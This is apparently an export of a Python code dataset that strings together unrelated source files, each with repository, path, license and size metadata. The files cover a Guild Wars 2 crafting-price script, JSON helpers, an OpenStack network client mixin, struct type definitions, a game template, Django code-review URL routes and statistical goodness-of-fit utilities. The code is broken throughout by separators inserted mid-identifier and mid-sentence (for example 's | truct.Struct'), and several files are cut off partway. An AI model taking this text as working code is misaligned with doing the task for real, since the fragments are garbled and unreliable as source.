THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Purpose: Generates a crafting guide based on current market prices
'''
import urllib, json, time, threading, datetime, math
import items_l, name_list
from Queue import Queue
from collections import defaultdict
from ftplib import FTP
# FTP Login
ftp_url = "text"
ftp_user = "goes"
ftp_pass = "here"
# Dictionary of all the items we need prices of
recipeDict = items_l.items
# list of items we compute the cost of that is used by every craft
'''
Dictionary structure
Key: tier(t1,t2,t3,t4,t5)
Key: ore, wood, cloth, leather, bone, claw, fang, scale, totem, venom, blood, ingot, plank, bolt, dowel, plated_dowel, thread, small_haft, large_haft, leather_section, string, lump(sometimes)
name: full name
cost: buy cost or computed make cost
recipe: items to build, or None for base items
'''
items = {}
insigs = {}
total_buy = defaultdict(int)
total_cost = 0
# Store our xp needed to reach each level of crafting
xp_to_level = [0]
#threaded function to get info about an item
class getItem(threading.Thread):
def __init__(self,itemid,tier,sub_type,level,name):
self.url1 = "http://www.gw2spidy.com/api/v0.9/json/item/"
self.url2 = "http://www.guildwarstrade.com/api/public/item?id="
self.itemid = itemid
self.tier = tier
self.sub_type = sub_type
self.level = level
self.nm = name
self.result = None
threading.Thread.__init__(self)
def get_result(self):
self.result['result']['tier'] = self.tier
self.result['result']['sub_type'] = self.sub_type
if not self.level == None:
self.result['result']['level'] = self.level
self.result['result']['sname'] = self.nm
return self.result
# Function for Guildwarstrade prices
def gwt(self,result,item):
f = json.load(result)
self.result = {}
self.result['result'] = {}
self.result['result']['min_sale_unit_price'] = f['sell']
self.result['result']['name'] = name_list.names[item]
self.result['result']['data_id'] = item
def run(self):
while(1):
try:
f = urllib.urlopen(self.url1+self.itemid)
self.result = json.load(f)
break
except Exception, err:
print 'ERROR: %s. Trying backup website.\n' % str(err)#"Error getting url, trying again "+ self.url + self.item
try:
f = urllib.urlopen(self.url2+self.itemid)
self.gwt(f,self.itemid)
break
except Exception, err:
print 'ERROR: %s. Backup website failed.\n' % str(err)#"Error getting url, trying again "+ self.url + self.item
time.sleep(1)
# Get our item data using threads and a Queue
def getItemDict():
def producer(q):
for tier in recipeDict:
for sub_type in recipeDict[tier]:
thread = getItem(recipeDict[tier][sub_type],tier,sub_type,None,None)
| thread.start()
q.put(thread,True)
def consumer(q):
num = 1
den = 0
for tier in recipeDict:
den += len(recipeDict[tier])
while num <= den:
thread = q.get(True)
thread.join()
tmp = thread.get_result()
items.setdefault(tmp['result']['tier'],{})
| items[tmp['result']['tier']].setdefault(tmp['result']['sub_type'],{})
items[tmp['result']['tier']][tmp['result']['sub_type']]['name'] = tmp['result']['name']
items[tmp['result']['tier']][tmp['result']['sub_type']]['cost'] = tmp['result']['min_sale_unit_price']
items[tmp['result']['tier']][tmp['result']['sub_type']]['recipe'] = None
print str(num) +' of '+ str(den)
num += 1
q = Queue(3)
p_thread = threading.Thread(target=producer, args=(q,))
c_thread = threading.Thread(target=consumer, args=(q,))
p_thread.start()
c_thread.start()
p_thread.join()
c_thread.join()
# Get our insignia price data using threads and a Queue
def getInsigDict():
def producer2(q):
for tier in items_l.insig_list:
for sub_type in items_l.insig_list[tier]:
for level in items_l.insig_list[tier][sub_type]:
for name in items_l.insig_list[tier][sub_type][level]:
thread = getItem(items_l.insig_list[tier][sub_type][level][name],tier,sub_type,level,name)
thread.start()
q.put(thread,True)
def consumer2(q):
num = 1
den = 0
for tier in items_l.insig_list:
for sub_type in items_l.insig_list[tier]:
for level in items_l.insig_list[tier][sub_type]:
den += len(items_l.insig_list[tier][sub_type][level])
while num <= den:
thread = q.get(True)
thread.join()
tmp = thread.get_result()
tier = tmp['result']['tier']
sub_type = tmp['result']['sub_type']
level = tmp['result']['level']
name = tmp['result']['sname']
insigs.setdefault(tier,{})
insigs[tier].setdefault(sub_type,{})
insigs[tier][sub_type].setdefault(level,{})
insigs[tier][sub_type][level].setdefault(name,{})
insigs[tier][sub_type][level][name]['name'] = tmp['result']['name']
insigs[tier][sub_type][level][name]['cost'] = tmp['result']['min_sale_unit_price']
insigs[tier][sub_type][level][name]['recipe'] = None
print str(num) +' of '+ str(den)
num += 1
q = Queue(3)
p_thread = threading.Thread(target=producer2, args=(q,))
c_thread = threading.Thread(target=consumer2, args=(q,))
p_thread.start()
c_thread.start()
p_thread.join()
c_thread.join()
# add some costs to the dict
def appendCosts():
items['t1']['thread'] = {'name':'Spool of Jute Thread','cost':8,'recipe':None}
items['t1']['lump'] = {'name':'Lump of Tin','cost':8,'recipe':None}
items['t2']['thread'] = {'name':'Spool of Wool Thread','cost':16,'recipe':None}
items['t3']['thread'] = {'name':'Spool of Cotton Thread','cost':24,'recipe':None}
items['t3']['lump'] = {'name':'Lump of Coal','cost':16,'recipe':None}
items['t4']['thread'] = {'name':'Spool of Linen Thread','cost':32,'recipe':None}
items['t4']['lump'] = {'name':'Lump of Primordium','cost':48,'recipe':None}
items['t5']['thread'] = {'name':'Spool of Silk Thread','cost':48,'recipe':None}
# generate placeholders in items for parts
for tier in items:
for o in ['ingot','plank','bolt','dowel','plated_dowel','leather_section','small_haft','large_haft','string']:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.itec[tier][o]}
for t in items[tier][o]['recipe']:
items[tier][o]['cost'] += items[tier][o]['recipe'][t]*items[tier][t]['cost']
items[tier]['insc'] = {'fine1':{},'fine2':{},'master':{}}
items[tier]['insig'] = {'fine1':{},'fine2':{},'master':{}}
if tier == 't5':
items[tier]['insc']['rare'] = {}
items[tier]['insig']['rare'] = {}
for typ in ['insc','insig']:
for stier in items_l.itec[tier][typ]:
for keyv in items_l.itec[tier][typ][stier]:
items[tier][typ][stier][keyv] = {'name':tier+'_'+keyv,'cost':0,'recipe':items_l.itec[tier][typ][stier][keyv]}
for o in items[tier][typ][stier][keyv]['recipe']:
items[tier][typ][stier][keyv]['cost'] += items[tier][typ][stier][keyv]['recipe'][o]*items[tier][o]['cost']
for o in items_l.wc:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.wc[o]}
for t in items[tier][o]['recipe']:
items[tier][o]['cost'] += items[tier][o]['recipe'][t]*items[tier][t]['cost']
for o in items_l.ht:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.ht[o]}
for t in items[tier][o]['recipe']:
items[tier] |
voidfiles/lark | lark/ext/utils.py | Python | mit | 800 | 0.0025 | import datetime
import json
import random
import string
class RedisApiException(Exception):
def __init__(self, message, status_code, *args, **kwargs):
super(RedisApiException, self).__init__(message)
self.status_code = status_code
class DateTimeJSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
| return obj.isoformat()
| if isinstance(obj, set):
return list(obj)
if obj and hasattr(obj, 'to_json'):
obj = obj.to_json()
return super(DateTimeJSONEncoder, self).default(obj)
json_dumps = DateTimeJSONEncoder()
def generate_random_string(length=13, chars=string.ascii_letters + string.digits, ):
return ''.join(random.choice(chars) for i in range(length))
|
dtroyer/python-openstacksdk | openstack/cloud/_network.py | Python | apache-2.0 | 104,230 | 0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either expr | ess or imp | lied.
# See the License for the specific language governing permissions and
# limitations under the License.
# import types so that we can reference ListType in sphinx param declarations.
# We can't just use list, because sphinx gets confused by
# openstack.resource.Resource.list and openstack.resource2.Resource.list
import six
import time
import threading
import types # noqa
from openstack.cloud import exc
from openstack.cloud import _normalize
from openstack.cloud import _utils
from openstack import exceptions
from openstack import proxy
class NetworkCloudMixin(_normalize.Normalizer):
def __init__(self):
self._ports = None
self._ports_time = 0
self._ports_lock = threading.Lock()
@_utils.cache_on_arguments()
def _neutron_extensions(self):
extensions = set()
resp = self.network.get('/extensions.json')
data = proxy._json_response(
resp,
error_message="Error fetching extension list for neutron")
for extension in self._get_and_munchify('extensions', data):
extensions.add(extension['alias'])
return extensions
def _has_neutron_extension(self, extension_alias):
return extension_alias in self._neutron_extensions()
def search_networks(self, name_or_id=None, filters=None):
"""Search networks
:param name_or_id: Name or ID of the desired network.
:param filters: a dict containing additional filters to use. e.g.
{'router:external': True}
:returns: a list of ``munch.Munch`` containing the network description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
networks = self.list_networks(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(networks, name_or_id, filters)
def search_routers(self, name_or_id=None, filters=None):
"""Search routers
:param name_or_id: Name or ID of the desired router.
:param filters: a dict containing additional filters to use. e.g.
{'admin_state_up': True}
:returns: a list of ``munch.Munch`` containing the router description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
routers = self.list_routers(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(routers, name_or_id, filters)
def search_subnets(self, name_or_id=None, filters=None):
"""Search subnets
:param name_or_id: Name or ID of the desired subnet.
:param filters: a dict containing additional filters to use. e.g.
{'enable_dhcp': True}
:returns: a list of ``munch.Munch`` containing the subnet description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
subnets = self.list_subnets(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(subnets, name_or_id, filters)
def search_ports(self, name_or_id=None, filters=None):
"""Search ports
:param name_or_id: Name or ID of the desired port.
:param filters: a dict containing additional filters to use. e.g.
{'device_id': '2711c67a-b4a7-43dd-ace7-6187b791c3f0'}
:returns: a list of ``munch.Munch`` containing the port description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
# If port caching is enabled, do not push the filter down to
# neutron; get all the ports (potentially from the cache) and
# filter locally.
if self._PORT_AGE or isinstance(filters, str):
pushdown_filters = None
else:
pushdown_filters = filters
ports = self.list_ports(pushdown_filters)
return _utils._filter_list(ports, name_or_id, filters)
def list_networks(self, filters=None):
"""List all available networks.
:param filters: (optional) dict of filter conditions to push down
:returns: A list of ``munch.Munch`` containing network info.
"""
# If the cloud is running nova-network, just return an empty list.
if not self.has_service('network'):
return []
# Translate None from search interface to empty {} for kwargs below
if not filters:
filters = {}
data = self.network.get("/networks.json", params=filters)
return self._get_and_munchify('networks', data)
def list_routers(self, filters=None):
"""List all available routers.
:param filters: (optional) dict of filter conditions to push down
:returns: A list of router ``munch.Munch``.
"""
# If the cloud is running nova-network, just return an empty list.
if not self.has_service('network'):
return []
# Translate None from search interface to empty {} for kwargs below
if not filters:
filters = {}
resp = self.network.get("/routers.json", params=filters)
data = proxy._json_response(
resp,
error_message="Error fetching router list")
return self._get_and_munchify('routers', data)
def list_subnets(self, filters=None):
"""List all available subnets.
:param filters: (optional) dict of filter conditions to push down
:returns: A list of subnet ``munch.Munch``.
"""
# If the cloud is running nova-network, just return an empty list.
if not self.has_service('network'):
return []
# Translate None from search interface to empty {} for kwargs below
if not filters:
filters = {}
data = self.network.get("/subnets.json", params=filters)
return self._get_and_munchify('subnets', data)
def list_ports(self, filters=None):
"""List all available ports.
:param filters: (optional) dict of filter conditions to push down
:returns: A list of port ``munch.Munch``.
"""
# If pushdown filters are specified and we do not have batched caching
# enabled, bypass local caching and push down the filters.
if filters and self._PORT_AGE == 0:
return self._list_ports(filters)
if (time.time() - self._ports_time) >= self._PORT_AGE:
# Since we're using cached data anyway, we don't need to
# have more than one thread actually submit the list
# ports task. Let the first one submit it while holding
# a lock, and the non-blocking acquire method will cause
# subsequent threads to just skip this and use the old
# data until it succeeds.
# Initially when we never got data, block to retrieve some data.
first_run = self._ports is None
if self._ports_lock.acquire(first_run):
try:
if not (first_run and self._ports is not None):
self._ports = self._list_ports({})
self._ports_time = time.time()
finally:
self._ports_lock.release()
# Wrap the return with filter_list so that if filters were passed
# but we were batching/caching and thus always fetching the whole
# list from the cloud, we still return a filtered list.
return _utils._filter_list(self._ports, None, filters or {})
def _list_ports(self, filters):
# If the cloud is run |
SkippsDev/Py-Slither | src/packet/BufferTypes.py | Python | mit | 442 | 0.002262 | import struct
boolean = struct.Struct("<?")
uint8 = struct.Struct("<B")
uint16 = struct.Struct("<H")
uint32 = s | truct.Struct("<I")
uint64 = struct.Struct("<Q")
int8 = struct. | Struct("<b")
int16 = struct.Struct("<h")
int24 = struct.Struct("<L")
int32 = struct.Struct("<i")
int64 = struct.Struct("<q")
float32 = struct.Struct("<f")
float64 = struct.Struct("<d")
string = struct.Struct("<s")
uoffset = uint32
soffset = int32
voffset = uint16 |
anhstudios/swganh | data/scripts/templates/object/tangible/ship/components/weapon/shared_wpn_rss_imperial_cannon.py | Python | mit | 491 | 0.044807 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.obj | ect import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/ship/components/weapon/shared_wpn_rss_imperial_cannon.iff"
result.attribute_template_id = 8
result.stfName("space/space_item","wpn_rss_imperial_cannon_n")
### | # BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
kscharding/integral-solutions-smxq | codereview/urls.py | Python | apache-2.0 | 3,897 | 0.00077 | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, sof | tware
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, eith | er express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""URL mappings for the codereview package."""
# NOTE: Must import *, since Django looks for things here, e.g. handler500.
from django.conf.urls.defaults import *
import django.views.defaults
from codereview import feeds
urlpatterns = patterns(
'codereview.views',
(r'^$', 'index'),
(r'^all$', 'all'),
(r'^mine$', 'mine'),
(r'^starred$', 'starred'),
(r'^new$', 'new'),
(r'^upload$', 'upload'),
(r'^(\d+)$', 'show', {}, 'show_bare_issue_number'),
(r'^(\d+)/(show)?$', 'show'),
(r'^(\d+)/add$', 'add'),
(r'^(\d+)/edit$', 'edit'),
(r'^(\d+)/delete$', 'delete'),
(r'^(\d+)/close$', 'close'),
(r'^(\d+)/mail$', 'mailissue'),
(r'^(\d+)/publish$', 'publish'),
(r'^download/issue(\d+)_(\d+)\.diff', 'download'),
(r'^download/issue(\d+)_(\d+)_(\d+)\.diff', 'download_patch'),
(r'^(\d+)/patch/(\d+)/(\d+)$', 'patch'),
(r'^(\d+)/image/(\d+)/(\d+)/(\d+)$', 'image'),
(r'^(\d+)/diff/(\d+)/(.+)$', 'diff'),
(r'^(\d+)/diff2/(\d+):(\d+)/(.+)$', 'diff2'),
(r'^(\d+)/diff_skipped_lines/(\d+)/(\d+)/(\d+)/(\d+)/([tba])/(\d+)$',
'diff_skipped_lines'),
(r'^(\d+)/diff_skipped_lines/(\d+)/(\d+)/$',
django.views.defaults.page_not_found, {}, 'diff_skipped_lines_prefix'),
(r'^(\d+)/diff2_skipped_lines/(\d+):(\d+)/(\d+)/(\d+)/(\d+)/([tba])/(\d+)$',
'diff2_skipped_lines'),
(r'^(\d+)/diff2_skipped_lines/(\d+):(\d+)/(\d+)/$',
django.views.defaults.page_not_found, {}, 'diff2_skipped_lines_prefix'),
(r'^(\d+)/upload_content/(\d+)/(\d+)$', 'upload_content'),
(r'^(\d+)/upload_patch/(\d+)$', 'upload_patch'),
(r'^(\d+)/upload_complete/(\d+)?$', 'upload_complete'),
(r'^(\d+)/description$', 'description'),
(r'^(\d+)/fields', 'fields'),
(r'^(\d+)/star$', 'star'),
(r'^(\d+)/unstar$', 'unstar'),
(r'^(\d+)/draft_message$', 'draft_message'),
(r'^api/(\d+)/?$', 'api_issue'),
(r'^api/(\d+)/(\d+)/?$', 'api_patchset'),
(r'^user/([^/]+)$', 'show_user'),
(r'^user/([^/]+)/block$', 'block_user'),
(r'^inline_draft$', 'inline_draft'),
(r'^repos$', 'repos'),
(r'^repo_new$', 'repo_new'),
(r'^repo_init$', 'repo_init'),
(r'^branch_new/(\d+)$', 'branch_new'),
(r'^branch_edit/(\d+)$', 'branch_edit'),
(r'^branch_delete/(\d+)$', 'branch_delete'),
(r'^settings$', 'settings'),
(r'^account_delete$', 'account_delete'),
(r'^migrate_entities$', 'migrate_entities'),
(r'^user_popup/(.+)$', 'user_popup'),
(r'^(\d+)/patchset/(\d+)$', 'patchset'),
(r'^(\d+)/patchset/(\d+)/delete$', 'delete_patchset'),
(r'^account$', 'account'),
(r'^use_uploadpy$', 'use_uploadpy'),
(r'^_ah/xmpp/message/chat/', 'incoming_chat'),
(r'^_ah/mail/(.*)', 'incoming_mail'),
(r'^xsrf_token$', 'xsrf_token'),
# patching upload.py on the fly
(r'^static/upload.py$', 'customized_upload_py'),
(r'^search$', 'search'),
(r'^tasks/calculate_delta$', 'calculate_delta'),
(r'^tasks/migrate_entities$', 'task_migrate_entities'),
)
feed_dict = {
'reviews': feeds.ReviewsFeed,
'closed': feeds.ClosedFeed,
'mine' : feeds.MineFeed,
'all': feeds.AllFeed,
'issue' : feeds.OneIssueFeed,
}
urlpatterns += patterns(
'',
(r'^rss/(?P<url>.*)$', 'django.contrib.syndication.views.feed',
{'feed_dict': feed_dict}),
)
|
forcedotcom/distributions | distributions/util.py | Python | bsd-3-clause | 7,375 | 0.000271 | # Copyright (c) 2014, Salesforce.com, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of Salesforce.com nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy
import scipy.stats
from collections import defaultdict
def scores_to_probs(scores):
scores = numpy.array(scores)
scores -= scores.max()
probs = numpy.exp(scores, out=scores)
probs /= probs.sum()
return probs
def score_to_empirical_kl(score, count):
"""
Convert total log score to KL( empirical || model ),
where the empirical pdf is uniform over `count` datapoints.
"""
count = float(count)
return -score / count - numpy.log(count)
def print_histogram(probs, counts):
WIDTH = 60.0
max_count = max(counts)
print '{: >8} {: >8}'.format('Prob', 'Count')
for prob, count in sorted(zip(probs, counts), reverse=True):
width = int(round(WIDTH * count / max_count))
print '{: >8.3f} {: >8d} {}'.format(prob, count, '-' * width)
def multinomial_goodness_of_fit(
probs,
counts,
total_count,
truncated=False,
plot=False):
"""
Pearson's chi^2 test, on possibly truncated data.
http://en.wikipedia.org/wiki/Pearson%27s_chi-squared_test
Returns:
p-value of truncated multinomial sample.
"""
assert len(probs) == len(counts)
assert truncated or total_count == sum(counts)
chi_squared = 0
dof = 0
if plot:
print_histogram(probs, counts)
for p, c in zip(probs, counts):
if p == 1:
return 1 if c == total_count else 0
assert p < 1, 'bad probability: %g' % p
if p > 0:
mean = total_count * p
variance = total_count * p * (1 - p)
assert variance > 1,\
'WARNING goodness of fit is inaccurate; use more samples'
chi_squared += (c - mean) ** 2 / variance
dof += 1
else:
print 'WARNING zero probability in goodness-of-fit test'
if c > 0:
return float('inf')
if not truncated:
dof -= 1
survival = scipy.stats.chi2.sf(chi_squared, dof)
return survival
def unif01_goodness_of_fit(samples, plot=False):
"""
Bin uniformly distributed samples and apply Pearson's chi^2 test.
"""
samples = numpy.array(samples, dtype=float)
assert samples.min() >= 0.0
assert samples.max() <= 1.0
bin_count = int(round(len(samples) ** 0.333))
assert bin_count >= 7, 'WARNING imprecise test, use more samples'
probs = numpy.ones(bin_count, dtype=numpy.float) / bin_count
counts = numpy.zeros(bin_count, dtype=numpy.int)
for sample in samples:
counts[int(bin_count * sample)] += 1
return multinomial_goodness_of_fit(probs, counts, len(samples), plot=plot)
def density_goodness_of_fit(samples, probs, plot=False):
"""
Transform arbitrary continuous samples to unif01 distribution
and assess goodness of fit via Pearson's chi^2 test.
Inputs:
samples - a list of real-valued samples from a distribution
probs - a list of probability densities evaluated at those samples
"""
assert len(samples) == len(probs)
assert len(samples) > | 100, 'WARNING imprecision; use more samples'
pairs = zip(samples | , probs)
pairs.sort()
samples = numpy.array([x for x, p in pairs])
probs = numpy.array([p for x, p in pairs])
density = numpy.sqrt(probs[1:] * probs[:-1])
gaps = samples[1:] - samples[:-1]
unif01_samples = 1.0 - numpy.exp(-len(samples) * gaps * density)
return unif01_goodness_of_fit(unif01_samples, plot=plot)
def discrete_goodness_of_fit(
samples,
probs_dict,
truncate_beyond=8,
plot=False):
"""
Transform arbitrary discrete data to multinomial
and assess goodness of fit via Pearson's chi^2 test.
"""
assert len(samples) > 100, 'WARNING imprecision; use more samples'
counts = defaultdict(lambda: 0)
for sample in samples:
assert sample in probs_dict
counts[sample] += 1
items = [(prob, counts.get(i, 0)) for i, prob in probs_dict.iteritems()]
items.sort(reverse=True)
truncated = (truncate_beyond and truncate_beyond < len(items))
if truncated:
items = items[:truncate_beyond]
probs = [prob for prob, count in items]
counts = [count for prob, count in items]
return multinomial_goodness_of_fit(
probs,
counts,
len(samples),
truncated=truncated,
plot=plot)
def bin_samples(samples, k=10, support=[]):
"""
Bins a collection of univariate samples into k bins of equal
fill via the empirical cdf, to be used in goodness of fit testing.
Returns
counts : array k x 1
bin_ranges : arrary k x 2
each count is the number of samples in [bin_min, bin_max)
except for the last bin which is [bin_min, bin_max]
list partitioning algorithm adapted from Mark Dickinson:
http://stackoverflow.com/questions/2659900
"""
samples = sorted(samples)
N = len(samples)
q, r = divmod(N, k)
#we need to distribute the remainder relatively evenly
#tests will be inaccurate if we have small bins at the end
indices = [i * q + min(r, i) for i in range(k + 1)]
bins = [samples[indices[i]: indices[i + 1]] for i in range(k)]
bin_ranges = []
counts = []
for i in range(k):
bin_min = bins[i][0]
try:
bin_max = bins[i + 1][0]
except IndexError:
bin_max = bins[i][-1]
bin_ranges.append([bin_min, bin_max])
counts.append(len(bins[i]))
if support:
bin_ranges[0][0] = support[0]
bin_ranges[-1][1] = support[1]
return numpy.array(counts), numpy.array(bin_ranges)
def histogram(samples, bin_count=None):
if bin_count is None:
bin_count = numpy.max(samples) + 1
v = numpy.zeros(bin_count, dtype=int)
for sample in samples:
v[sample] += 1
return v
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.